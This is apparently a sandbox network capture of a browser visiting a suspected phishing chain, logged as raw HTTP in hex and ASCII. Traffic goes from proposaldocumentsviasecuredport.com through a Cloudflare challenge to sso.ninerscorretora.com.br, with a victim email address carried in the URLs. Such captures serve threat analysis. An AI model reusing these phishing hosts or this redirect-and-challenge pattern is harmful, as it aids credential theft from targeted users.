2025-03-25 20:29:25 UTC	1369	IN	Data Raw: 28 33 35 31 29 5d 28 30 29 3b 65 6c 73 65 20 72 65 74 75 72 6e 20 6e 75 6c 6c 3b 4c 5b 61 32 28 34 30 32 29 5d 28 55 29 2c 48 5b 4a 2b 2b 5d 3d 4d 2b 55 5b 61 32 28 33 35 31 29 5d 28 30 29 2c 49 2d 2d 2c 4d 3d 55 2c 49 3d 3d 30 26 26 28 49 3d 4d 61 74 68 5b 61 32 28 33 34 39 29 5d 28 32 2c 4b 29 2c 4b 2b 2b 29 7d 7d 7d 2c 67 3d 7b 7d 2c 67 5b 58 28 33 37 38 29 5d 3d 66 2e 68 2c 67 7d 28 29 2c 6b 3d 7b 7d 2c 6b 5b 57 28 33 34 32 29 5d 3d 27 6f 27 2c 6b 5b 57 28 33 34 31 29 5d 3d 27 73 27 2c 6b 5b 57 28 34 30 35 29 5d 3d 27 75 27 2c 6b 5b 57 28 34 30 31 29 5d 3d 27 7a 27 2c 6b 5b 57 28 33 34 35 29 5d 3d 27 6e 27 2c 6b 5b 57 28 33 31 30 29 5d 3d 27 49 27 2c 6b 5b 57 28 34 30 39 29 5d 3d 27 62 27 2c 6c 3d 6b 2c 68 5b 57 28 33 32 31 29 5d 3d 66 75 6e 63 74 69 Data Ascii: (351)](0);else return null;L[a2(402)](U),H[J++]=M+U[a2(351)](0),I--,M=U,I==0&&(I=Math[a2(349)](2,K),K++)}}},g={},g[X(378)]=f.h,g}(),k={},k[W(342)]='o',k[W(341)]='s',k[W(405)]='u',k[W(401)]='z',k[W(345)]='n',k[W(310)]='I',k[W(409)]='b',l=k,h[W(321)]=functi
2025-03-25 20:29:25 UTC	1369	IN	Data Raw: 4b 5b 61 68 28 33 39 39 29 5d 28 61 68 28 33 30 39 29 2c 4a 29 2c 4b 5b 61 68 28 33 31 34 29 5d 3d 32 35 30 30 2c 4b 5b 61 68 28 33 37 31 29 5d 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 7d 2c 4c 3d 7b 7d 2c 4c 5b 61 68 28 33 38 39 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 38 39 29 5d 2c 4c 5b 61 68 28 33 35 37 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 35 37 29 5d 2c 4c 5b 61 68 28 33 30 33 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 30 33 29 5d 2c 4c 5b 61 68 28 33 38 36 29 5d 3d 68 5b 61 68 28 33 39 32 29 5d 5b 61 68 28 33 34 38 29 5d 2c 4d 3d 4c 2c 4e 3d 7b 7d 2c 4e 5b 61 68 28 33 39 38 29 5d 3d 48 2c 4e 5b 61 68 28 33 38 38 29 5d 3d 4d 2c 4e 5b 61 68 28 33 33 36 29 5d 3d 61 68 28 33 39 36 29 2c 4b 5b 61 68 28 33 34 37 29 5d Data Ascii: K[ah(399)](ah(309),J),K[ah(314)]=2500,K[ah(371)]=function(){},L={},L[ah(389)]=h[ah(392)][ah(389)],L[ah(357)]=h[ah(392)][ah(357)],L[ah(303)]=h[ah(392)][ah(303)],L[ah(386)]=h[ah(392)][ah(348)],M=L,N={},N[ah(398)]=H,N[ah(388)]=M,N[ah(336)]=ah(396),K[ah(347)]
2025-03-25 20:29:25 UTC	1369	IN	Data Raw: 65 72 72 6f 72 49 6e 66 6f 4f 62 6a 65 63 74 2c 6f 70 65 6e 2c 72 65 61 64 79 53 74 61 74 65 2c 73 79 6d 62 6f 6c 2c 70 75 73 68 2c 69 6e 64 65 78 4f 66 2c 78 68 72 2d 65 72 72 6f 72 2c 75 6e 64 65 66 69 6e 65 64 2c 70 6f 73 74 4d 65 73 73 61 67 65 2c 65 76 65 6e 74 2c 58 4d 4c 48 74 74 70 52 65 71 75 65 73 74 2c 62 6f 6f 6c 65 61 6e 2c 73 74 79 6c 65 2c 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2c 73 70 6c 69 74 2c 38 37 36 35 32 38 4a 49 70 70 50 4a 2c 63 46 50 57 76 2c 2f 69 6e 76 69 73 69 62 6c 65 2f 6a 73 64 2c 36 32 30 46 44 78 41 46 57 2c 6a 6f 69 6e 2c 63 68 6c 41 70 69 52 75 6d 57 69 64 67 65 74 41 67 65 4d 73 2c 37 33 39 38 31 35 32 72 59 63 64 66 57 2c 64 2e 63 6f 6f 6b 69 65 2c 68 61 73 4f 77 6e 50 72 6f 70 65 72 74 79 2c 73 70 6c 69 63 65 2c 34 Data Ascii: errorInfoObject,open,readyState,symbol,push,indexOf,xhr-error,undefined,postMessage,event,XMLHttpRequest,boolean,style,contentWindow,split,876528JIppPJ,cFPWv,/invisible/jsd,620FDxAFW,join,chlApiRumWidgetAgeMs,7398152rYcdfW,d.cookie,hasOwnProperty,splice,4
2025-03-25 20:29:25 UTC	1143	IN	Data Raw: 5d 5b 61 34 28 33 36 32 29 5d 28 67 5b 45 5d 29 3f 27 61 27 3a 67 5b 45 5d 3d 3d 3d 65 5b 61 34 28 33 33 33 29 5d 3f 27 45 27 3a 21 30 3d 3d 3d 67 5b 45 5d 3f 27 54 27 3a 21 31 3d 3d 3d 67 5b 45 5d 3f 27 46 27 3a 28 46 3d 74 79 70 65 6f 66 20 67 5b 45 5d 2c 61 34 28 33 36 36 29 3d 3d 46 3f 6d 28 65 2c 67 5b 45 5d 29 3f 27 4e 27 3a 27 66 27 3a 6c 5b 46 5d 7c 7c 27 3f 27 29 7d 66 75 6e 63 74 69 6f 6e 20 6d 28 63 2c 65 2c 61 33 29 7b 72 65 74 75 72 6e 20 61 33 3d 57 2c 65 20 69 6e 73 74 61 6e 63 65 6f 66 20 63 5b 61 33 28 33 35 33 29 5d 26 26 30 3c 63 5b 61 33 28 33 35 33 29 5d 5b 61 33 28 33 31 35 29 5d 5b 61 33 28 33 38 31 29 5d 5b 61 33 28 33 33 31 29 5d 28 65 29 5b 61 33 28 34 30 33 29 5d 28 61 33 28 33 38 33 29 29 7d 66 75 6e 63 74 69 6f 6e 20 62 28 63 Data Ascii: ][a4(362)](g[E])?'a':g[E]===e[a4(333)]?'E':!0===g[E]?'T':!1===g[E]?'F':(F=typeof g[E],a4(366)==F?m(e,g[E])?'N':'f':l[F]\|\|'?')}function m(c,e,a3){return a3=W,e instanceof c[a3(353)]&&0<c[a3(353)][a3(315)][a3(381)][a3(331)](e)[a3(403)](a3(383))}function b(c

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:25 UTC	1143	OUT	POST /cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283 HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive Content-Length: 16611 sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" Content-Type: text/plain;charset=UTF-8 sec-ch-ua-mobile: ?0 Accept: / Origin: https://proposaldocumentsviasecuredport.com Sec-Fetch-Site: same-origin Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
2025-03-25 20:29:25 UTC	16384	OUT	Data Raw: 42 4b 67 50 45 53 6e 77 45 69 67 45 58 57 5a 6e 54 6e 7a 70 72 50 53 4d 70 55 65 70 44 75 44 4a 4a 53 77 6e 48 34 70 37 35 4d 2b 35 63 67 70 6c 37 41 6d 5a 35 69 6e 74 70 58 54 67 66 71 4b 4b 70 55 79 4a 70 52 70 4a 4d 4a 67 6e 70 43 4a 6e 32 5a 49 50 79 69 4b 4f 62 36 50 37 35 4c 4b 65 55 39 74 7a 57 66 46 50 32 4c 45 68 65 78 6e 39 34 37 79 44 70 45 67 67 76 44 6c 53 4f 71 70 4e 66 71 63 31 4f 70 31 50 57 6c 70 53 68 67 70 44 50 53 53 50 4c 58 50 44 70 6e 35 70 72 69 6b 70 6e 78 4f 70 73 61 77 55 66 4b 41 6e 55 79 71 67 70 53 61 4f 70 53 5a 6d 72 70 6d 53 70 6e 4f 43 63 2d 67 36 74 65 4d 53 66 53 6e 31 32 65 4b 34 45 4c 24 38 31 37 70 75 50 53 44 30 56 4b 70 77 6b 4b 35 57 63 37 59 43 66 70 6d 38 31 79 4c 75 55 50 70 2d 79 75 63 44 67 78 45 38 79 69 24 Data Ascii: BKgPESnwEigEXWZnTnzprPSMpUepDuDJJSwnH4p75M+5cgpl7AmZ5intpXTgfqKKpUyJpRpJMJgnpCJn2ZIPyiKOb6P75LKeU9tzWfFP2LEhexn947yDpEggvDlSOqpNfqc1Op1PWlpShgpDPSSPLXPDpn5prikpnxOpsawUfKAnUyqgpSaOpSZmrpmSpnOCc-g6teMSfSn12eK4EL$817puPSD0VKpwkK5Wc7YCfpm81yLuUPp-yucDgxE8yi$
2025-03-25 20:29:25 UTC	227	OUT	Data Raw: 48 50 33 33 58 53 45 62 6e 68 6c 44 67 2d 78 37 6b 6c 67 77 68 2d 6e 32 71 5a 55 4a 50 4d 4e 2d 6e 44 32 35 4a 57 6f 57 53 45 6c 6e 51 33 53 6a 50 50 78 4c 33 70 6c 53 66 2d 6a 58 4e 77 57 67 67 33 6d 44 68 68 50 48 56 41 34 7a 45 48 6d 73 64 6e 70 42 2d 6e 79 4a 52 4e 75 6b 6c 6f 73 73 79 65 34 6d 2b 37 4c 35 70 70 6e 6b 42 62 2b 49 63 4e 2d 42 5a 6b 5a 68 77 6a 36 5a 50 71 58 6b 75 6d 71 6c 34 49 73 75 43 50 63 51 67 6b 31 77 33 54 61 65 72 33 4c 72 54 72 67 70 70 72 4a 46 65 67 2d 58 71 50 70 6e 24 6e 4e 57 55 70 70 70 38 68 6e 77 5a 70 4a 54 57 6d 2d 5a 70 70 70 57 63 6a 4a 5a 70 70 63 65 56 6c 6e 44 70 77 70 51 33 4e 77 45 63 6c 72 61 6f 62 54 75 70 70 70 38 75 70 70 Data Ascii: HP33XSEbnhlDg-x7klgwh-n2qZUJPMN-nD25JWoWSElnQ3SjPPxL3plSf-jXNwWgg3mDhhPHVA4zEHmsdnpB-nyJRNuklossye4m+7L5ppnkBb+IcN-BZkZhwj6ZPqXkumql4IsuCPcQgk1w3Taer3LrTrgpprJFeg-XqPpn$nNWUppp8hnwZpJTWm-ZpppWcjJZppceVlnDpwpQ3NwEclraobTuppp8upp
2025-03-25 20:29:25 UTC	1315	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:25 GMT Content-Type: text/plain; charset=UTF-8 Content-Length: 0 Connection: close Set-Cookie: cf_clearance=; Path=/; Expires=Thu, 01-Jan-70 00:00:00 GMT; Domain=proposaldocumentsviasecuredport.com; HttpOnly; Secure; SameSite=None Set-Cookie: cf_clearance=NR8TDr1rWiYe0g_uPfUU1y1PgxOg5R0XUv8o9MjHwIY-1742934565-1.2.1.1-H9pGY0RVPoAfj4FCkRT6KpY5qtVk3Yl7QD77EnxJP_0EFd4Lx_vXU9FVMwUi7miTyQFBHfiVuSnfLGiVsSwWDf.ImVhbeKXAYg55PurPFUeGlH1FcRRJdjTvEX7yfHPx_k3wxbIhAs6_vjSRk1oUtgYYK6xDorWevV60_ByfVlERID5vdY8dBdhgdIUcV2fSXtiQWydCXwcEsKwuj20gxVWFYMU3trvMcnK5CAJg.5i_jdQINk5P7PqRhooFFUitzBT4ArRybSXpy6p4t_YxcbHO50nhpFmVn3KnsnS_RkpzTiZ9yzuvQOjzSQ9wOuCnxQMjxd1anfPjeAcPMhbmH9FXbz525yERds6pXrhTG7E; Path=/; Expires=Wed, 25-Mar-26 20:29:25 GMT; Domain=proposaldocumentsviasecuredport.com; HttpOnly; Secure; SameSite=None; Partitioned Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UacZhf1BqI%2ByivkJ5qHKc2qj3KfsqhH4Q241FpSqcF%2BR0h0%2FeeTWtNKSBeD18XwpvsfnB%2B%2FBFLpFg3FjC%2BvNXsZ0k%2B0TFUkr3E34y5XvKV8xO7yKkHovpOrg3YvnK5u6vPYsvFA0Qt6g%2Be1MvA7K9JMZgMMig%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9261290c5c0f88c3-EWR alt-svc: h3=":443"; ma=86400
2025-03-25 20:29:25 UTC	223	IN	Data Raw: 73 65 72 76 65 72 2d 74 69 6d 69 6e 67 3a 20 63 66 4c 34 3b 64 65 73 63 3d 22 3f 70 72 6f 74 6f 3d 54 43 50 26 72 74 74 3d 31 30 31 37 35 30 26 6d 69 6e 5f 72 74 74 3d 31 30 30 32 39 34 26 72 74 74 5f 76 61 72 3d 32 32 36 35 33 26 73 65 6e 74 3d 31 39 26 72 65 63 76 3d 32 32 26 6c 6f 73 74 3d 30 26 72 65 74 72 61 6e 73 3d 30 26 73 65 6e 74 5f 62 79 74 65 73 3d 32 38 39 36 26 72 65 63 76 5f 62 79 74 65 73 3d 31 38 33 39 32 26 64 65 6c 69 76 65 72 79 5f 72 61 74 65 3d 33 37 31 32 38 26 63 77 6e 64 3d 32 35 30 26 75 6e 73 65 6e 74 5f 62 79 74 65 73 3d 30 26 63 69 64 3d 32 65 61 36 33 39 66 33 66 37 62 66 36 37 35 65 26 74 73 3d 33 35 39 26 78 3d 30 22 0d 0a 0d 0a Data Ascii: server-timing: cfL4;desc="?proto=TCP&rtt=101750&min_rtt=100294&rtt_var=22653&sent=19&recv=22&lost=0&retrans=0&sent_bytes=2896&recv_bytes=18392&delivery_rate=37128&cwnd=250&unsent_bytes=0&cid=2ea639f3f7bf675e&ts=359&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:26 UTC	1068	OUT	GET /favicon.ico HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: image/avif,image/webp,image/apng,image/svg+xml,image/,/*;q=0.8 Sec-Fetch-Site: same-origin Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: image Referer: https://proposaldocumentsviasecuredport.com/ZayUC/?email=john.smith%40microsoft.com Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
2025-03-25 20:29:26 UTC	1127	IN	HTTP/1.1 404 Not Found Date: Tue, 25 Mar 2025 20:29:26 GMT Content-Type: text/html; charset=iso-8859-1 Transfer-Encoding: chunked Connection: close Vary: Accept-Encoding X-Content-Type-Options: nosniff X-Content-Type-Options: nosniff X-XSS-Protection: 1; mode=block X-XSS-Protection: 1; mode=block Cache-Control: public, max-age=315360000, stale-while-revalidate=315360000, stale-if-error=315360000, immutable Pragma: public CF-Cache-Status: HIT Age: 103391 Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=sBAgcOpK86giaC%2Fx9qnmphHzWfkaIF8kEQYWigUtpsbwtXcvezGaMJDfavhkUT7fa9lAPo7RL532xcc4rdRZ0RGlNk2gbe6lz45dGker0C7fhN0HH9dIYUxZ%2FgEsgF4LHgbFVgjdcEILD9Rz%2FUbAus5ZDTouVg%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 9261290ee8636a52-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=111530&min_rtt=105779&rtt_var=30964&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2896&recv_bytes=1640&delivery_rate=30231&cwnd=247&unsent_bytes=0&cid=124af88d4635b1c1&ts=285&x=0"
2025-03-25 20:29:26 UTC	242	IN	Data Raw: 31 33 62 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 70 3e 41 64 64 69 74 69 6f 6e 61 6c 6c 79 2c 20 61 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0a 65 72 72 6f 72 20 77 61 73 20 65 6e 63 6f 75 6e 74 65 72 65 64 20 77 Data Ascii: 13b<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><p>Additionally, a 404 Not Founderror was encountered w
2025-03-25 20:29:26 UTC	80	IN	Data Raw: 68 69 6c 65 20 74 72 79 69 6e 67 20 74 6f 20 75 73 65 20 61 6e 20 45 72 72 6f 72 44 6f 63 75 6d 65 6e 74 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 65 20 72 65 71 75 65 73 74 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a 0d 0a Data Ascii: hile trying to use an ErrorDocument to handle the request.</p></body></html>
2025-03-25 20:29:26 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:26 UTC	922	OUT	GET /cdn-cgi/challenge-platform/h/b/jsd/r/0.9880444760699761:1742930777:v0BwmuIV3nHTcJ9doLgIeqC4946_BfI3JSB4KgVDHmw/9261290858884283 HTTP/1.1 Host: proposaldocumentsviasecuredport.com Connection: keep-alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: / Sec-Fetch-Site: none Sec-Fetch-Mode: cors Sec-Fetch-Dest: empty Sec-Fetch-Storage-Access: active Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: 5fPcEN940Iij5LexFBM8i1K_NUI=cFLzUvmOaMFVSJXyIoQ9gitKf48; Hrtt5L2PUT1G82Ub72LRnRj2zEY=1742934563; HOvzofOCL_89s0mwUIUtH06-Y44=1743020963; nl7hDPvwUmmdFxUfvww3WgqLk9M=LhWaadEVmztEguxdRXgPVGKflPs; fSR249O6MYLvXM5jpcNL1q5tr4o=3hzZJGaeMvYM7jRNJS9rkFgWO3M; riUofr0n8AfLgf7hKnugHijGX0Q=1742934564; PmYLFtceC7bvtWQUj0IlMMJPtHI=1743020964; X7zD0pYRSM6DdHXP6iTHdTjmVGs=eta3_lUYomtUZ4JfPJkf_MS-Ukg
2025-03-25 20:29:26 UTC	784	IN	HTTP/1.1 405 Method Not Allowed Date: Tue, 25 Mar 2025 20:29:26 GMT Content-Length: 0 Connection: close allow: POST Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=7jbkxu4mns%2FD4i7vTYCTE8WTuUHzvYIXuWy8oFxgOXK67DzEgbSvqmqBnk%2FzwMzaDTbiAZE0c1pelBWVavwbhN%2F%2B5kK8HCPfi02O7k64So8ofCD8pL0PAUt%2FAtF11x%2Froalc%2F9qkIpEbWB6VewJtpiQHJfNJWQ%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 926129116b7652c6-EWR alt-svc: h3=":443"; ma=86400 server-timing: cfL4;desc="?proto=TCP&rtt=101525&min_rtt=100430&rtt_var=22834&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2895&recv_bytes=1494&delivery_rate=35908&cwnd=248&unsent_bytes=0&cid=1e2b26a890707385&ts=262&x=0"

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:31 UTC	757	OUT	GET /?mjalaytm&email=john.smith@microsoft.com HTTP/1.1 Host: sso.ninerscorretora.com.br Connection: keep-alive sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document Referer: https://proposaldocumentsviasecuredport.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:31 UTC	453	IN	HTTP/1.1 302 Found Set-Cookie: qPdM=jYCRkos9k5Z0; path=/; samesite=none; secure; httponly Set-Cookie: qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY; path=/; samesite=none; secure; httponly location: /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com Date: Tue, 25 Mar 2025 20:29:31 GMT Connection: close Transfer-Encoding: chunked
2025-03-25 20:29:31 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:31 UTC	953	OUT	GET /?mjalaytm=1b4966f30328850aae45ecf1539a76e583ed8b55ea1934bb456645581c482b9366f885c577c097b0d0d4170cabc37856259921b0ebc08f20988de5b0de7eb0e8&email=john.smith%40microsoft.com HTTP/1.1 Host: sso.ninerscorretora.com.br Connection: keep-alive Upgrade-Insecure-Requests: 1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,/;q=0.8,application/signed-exchange;v=b3;q=0.7 Sec-Fetch-Site: cross-site Sec-Fetch-Mode: navigate Sec-Fetch-Dest: document sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 sec-ch-ua-platform: "Windows" Referer: https://proposaldocumentsviasecuredport.com/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9 Cookie: qPdM=jYCRkos9k5Z0; qPdM.sig=JtBFZ6EwDNCnYBno_SYUCHnifvY
2025-03-25 20:29:32 UTC	142	IN	HTTP/1.1 200 OK Content-Type: text/html;charset=UTF-8 Date: Tue, 25 Mar 2025 20:29:31 GMT Connection: close Transfer-Encoding: chunked
2025-03-25 20:29:32 UTC	3272	IN	Data Raw: 63 62 63 0d 0a 0a 3c 21 64 6f 63 74 79 70 65 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 2d 55 53 3e 3c 68 65 61 64 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 64 65 66 65 72 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 63 68 61 6c 6c 65 6e 67 65 73 2e 63 6c 6f 75 64 66 6c 61 72 65 2e 63 6f 6d 2f 74 75 72 6e 73 74 69 6c 65 2f 76 30 2f 61 70 69 2e 6a 73 3f 6f 6e 6c 6f 61 64 3d 6f 6e 6c 6f 61 64 54 75 72 6e 73 74 69 6c 65 43 61 6c 6c 62 61 63 6b 22 3e 0a 3c 2f 73 63 72 69 70 74 3e 20 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 20 3c 6d 65 74 61 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 22 20 6e 61 6d 65 3d Data Ascii: cbc<!doctype html><html lang=en-US><head> <script async defer src="https://challenges.cloudflare.com/turnstile/v0/api.js?onload=onloadTurnstileCallback"></script> <title>Just a moment...</title> <meta content="width=device-width,initial-scale=1" name=

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:32 UTC	626	OUT	GET /turnstile/v0/api.js?onload=onloadTurnstileCallback HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://sso.ninerscorretora.com.br/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:32 UTC	386	IN	HTTP/1.1 302 Found Date: Tue, 25 Mar 2025 20:29:32 GMT Content-Length: 0 Connection: close access-control-allow-origin: * cache-control: max-age=300, stale-if-error=10800, stale-while-revalidate=300, public cross-origin-resource-policy: cross-origin location: /turnstile/v0/b/708f7a809116/api.js Server: cloudflare CF-RAY: 92612936fc6fc425-EWR alt-svc: h3=":443"; ma=86400

Timestamp	Bytes transferred	Direction	Data
2025-03-25 20:29:32 UTC	610	OUT	GET /turnstile/v0/b/708f7a809116/api.js HTTP/1.1 Host: challenges.cloudflare.com Connection: keep-alive sec-ch-ua-platform: "Windows" User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36 sec-ch-ua: "Chromium";v="134", "Not:A-Brand";v="24", "Google Chrome";v="134" sec-ch-ua-mobile: ?0 Accept: / Sec-Fetch-Site: cross-site Sec-Fetch-Mode: no-cors Sec-Fetch-Dest: script Sec-Fetch-Storage-Access: active Referer: https://sso.ninerscorretora.com.br/ Accept-Encoding: gzip, deflate, br, zstd Accept-Language: en-US,en;q=0.9
2025-03-25 20:29:33 UTC	471	IN	HTTP/1.1 200 OK Date: Tue, 25 Mar 2025 20:29:33 GMT Content-Type: application/javascript; charset=UTF-8 Content-Length: 48123 Connection: close accept-ranges: bytes last-modified: Tue, 18 Mar 2025 12:36:20 GMT cache-control: max-age=31536000, stale-if-error=10800, stale-while-revalidate=31536000, public access-control-allow-origin: * cross-origin-resource-policy: cross-origin Server: cloudflare CF-RAY: 9261293a1ff55e4b-EWR alt-svc: h3=":443"; ma=86400
